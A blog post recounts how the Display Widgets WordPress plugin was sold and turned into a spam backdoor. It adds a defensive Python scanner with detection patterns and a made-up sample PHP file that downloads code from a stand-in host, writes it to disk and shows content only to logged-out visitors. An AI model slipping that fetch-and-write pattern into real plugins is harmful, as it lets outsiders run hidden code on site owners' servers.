Quite a few people try to abuse other people’s websites in order to send out spam: hiding malicious code inside their plugins, downloading extra “necessary” assets for the plugin to run, and so on.
So is the case with Display Widgets, a WordPress plugin with more than 200.000 active installs, according to wordpress.org.

So, what did really happen?

On May 19 2017, after a long thread of negotiations, the plugin was sold to a man named Mason Soiza for the fair amount of $15.000. It is not clear whether his intention all along was to buy the plugin in order to use it as a backdoor into the 200.000 websites that were using it, but this is what happened.

On June 22nd, an SEO consultant named David Law informed the WordPress team that the plugin was downloading additional code from an external server. This is not allowed for plugins on the WordPress repository, so the next day, June 23rd, the plugin was removed from the repository.

On June 30, the second release of the plugin under the new ownership, and the first to include the malicious code, was published on the WordPress repository. This code allowed the owner of the plugin, Soiza, to publish spam content to the infected websites. And the best part? The malicious content was entirely hidden from logged-in users, which means there was a 99% chance that the website owners had no idea what was happening on their website. It was David Law again who found that the plugin was logging visits to each website to an external server and reported it to the WordPress team. It is noteworthy that no one had found the hidden malicious code yet. The plugin was removed from the repository for the second time.

The plugin was revised and re-uploaded to the repository on July 6th, with the malicious code still there and unnoticed. The logging code had been tweaked with an on/off switch, which was off by default.

More than two weeks later, on July 23rd, Calvin Ngan opened a Trac issue on WordPress.org reporting that Display Widgets was posting spam on his website. He found that the malicious code was in a file named geolocation.php. Once again, the plugin was removed from the repository.

The plugin was uploaded again on September 2nd, with the malicious code still there. It had even been fixed, since there was a minor bug in the malicious code!

The plugin was deleted from the repository on September 8th, for the fourth time, which could actually be considered a record! In the meantime, the original author of the plugin posted on Twitter to warn people about the incident.

Users with a security plugin had been warned

WordPress admins who had WordFence installed on their website were warned all four times the plugin in question was deleted from the WordPress repository. That is because WordFence has a feature that informs admins when a plugin they use has been removed from wordpress.org, since most removals happen due to security issues.

How to protect yourself

It is common sense that such a massive platform as WordPress, which accounts for a large share of all websites, is a big target, and that leaves non tech-savvy admins like bloggers and hobby journalists exposed. Hundreds of websites are hacked on a daily basis. What you can do to protect yourself is to always keep WordPress up to date, since the team is constantly fixing security issues. The best thing you can do is install and use a security plugin such as WordFence, which I mentioned earlier and which is one of the greatest security plugins for WordPress. If you want to learn more on this matter, the whole timeline and the background of the man behind all this, go on and read the articles below from the WordFence blog: “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites” and “The Man Behind Plugin Spam: Mason Soiza”.

Have you been using this plugin? What do you think of this incident? Let me know in the comments below and don’t forget to share so that more people learn about this issue and take action!
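As an added example, not code from the original post, from WordFence or from the plugin itself, here is a small Python triage script that looks through a plugin’s PHP files for the behaviours the timeline above describes: fetching code from an external server, writing it to disk or evaluating it, and showing content only to visitors who are not logged in. The indicator patterns are my own heuristics, and the sample plugin sources are constructed for this example; the file name geolocation.php comes from the incident, but its contents here are made up and are not the real plugin’s code.

```python
import os
import re
from typing import Dict, List, Optional, Set, Tuple

# Heuristic indicators matched against PHP plugin source. Each one mirrors a
# behaviour described in the Display Widgets timeline: fetching code from an
# external server, writing it to disk or evaluating it, and serving content
# only to visitors who are not logged in. They are triage signals only;
# legitimate plugins also make remote requests, so every hit needs review.
INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(?:wp_remote_get|wp_remote_post|wp_remote_request|curl_init)\s*\("
        r"|\bfile_get_contents\s*\(\s*['\"]https?://",
        re.I,
    ),
    "code_write": re.compile(r"\bfile_put_contents\s*\(", re.I),
    "dynamic_eval": re.compile(r"\b(?:eval|create_function)\s*\(", re.I),
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I
    ),
    "logged_in_gate": re.compile(r"!\s*is_user_logged_in\s*\(\s*\)", re.I),
}


def classify(hits: Set[str]) -> Tuple[Optional[str], str]:
    """Map the set of indicator names found in one file to a severity."""
    if "remote_include" in hits or (
        "remote_fetch" in hits and hits & {"code_write", "dynamic_eval"}
    ):
        return "high", "fetches code from a remote server and writes or runs it"
    if "logged_in_gate" in hits:
        return "medium", "emits content only for visitors who are not logged in"
    if hits:
        return "low", "single indicator; common in legitimate plugins"
    return None, ""


def scan_plugin(files: Dict[str, str]) -> List[dict]:
    """Scan {relative path: PHP source} and return one finding per flagged file."""
    findings = []
    for path in sorted(files):
        hits = {name for name, rx in INDICATORS.items() if rx.search(files[path])}
        severity, reason = classify(hits)
        if severity is not None:
            findings.append({
                "file": path,
                "severity": severity,
                "indicators": sorted(hits),
                "reason": reason,
            })
    return findings


def scan_directory(root: str) -> List[dict]:
    """Read every .php file under a plugin directory and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_plugin(files)


# Constructed sample plugin: the file names follow the incident, the contents
# are made up for this example and are not the real plugin's code.
SAMPLE_PLUGIN = {
    "display-widgets/display-widgets.php": (
        "<?php\n/* Plugin Name: Example widgets */\n"
        "add_action('widgets_init', 'dw_register');\n"
        "function dw_register() { register_widget('DW_Widget'); }\n"
    ),
    "display-widgets/geolocation.php": (
        "<?php\n"
        "$resp = wp_remote_get('https://example.invalid/geo.bin');\n"
        "file_put_contents(__DIR__ . '/geo.php', wp_remote_retrieve_body($resp));\n"
        "if (!is_user_logged_in()) { echo get_option('dw_extra_content'); }\n"
    ),
    "display-widgets/updater.php": (
        "<?php\n$info = wp_remote_get('https://example.invalid/version.json');\n"
    ),
}

if __name__ == "__main__":
    for f in scan_plugin(SAMPLE_PLUGIN):
        print(f"{f['severity']:6} {f['file']}: {f['reason']} ({', '.join(f['indicators'])})")
```

On a real site you would call scan_directory() on a folder under wp-content/plugins and read through the files it flags. A plain remote request on its own only rates “low” because update checks and API calls are everyday plugin behaviour; the combination of a remote fetch with a write to disk or an eval is what made the Display Widgets case stand out, and that is what the script rates “high”.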
Lefteris


Lefteris is a frontend developer. He spends most of his day writing code in react native for our mobile applications while drinking coffee and telling bad jokes that only he laughs to. He also feels weird writing about himself in third person.
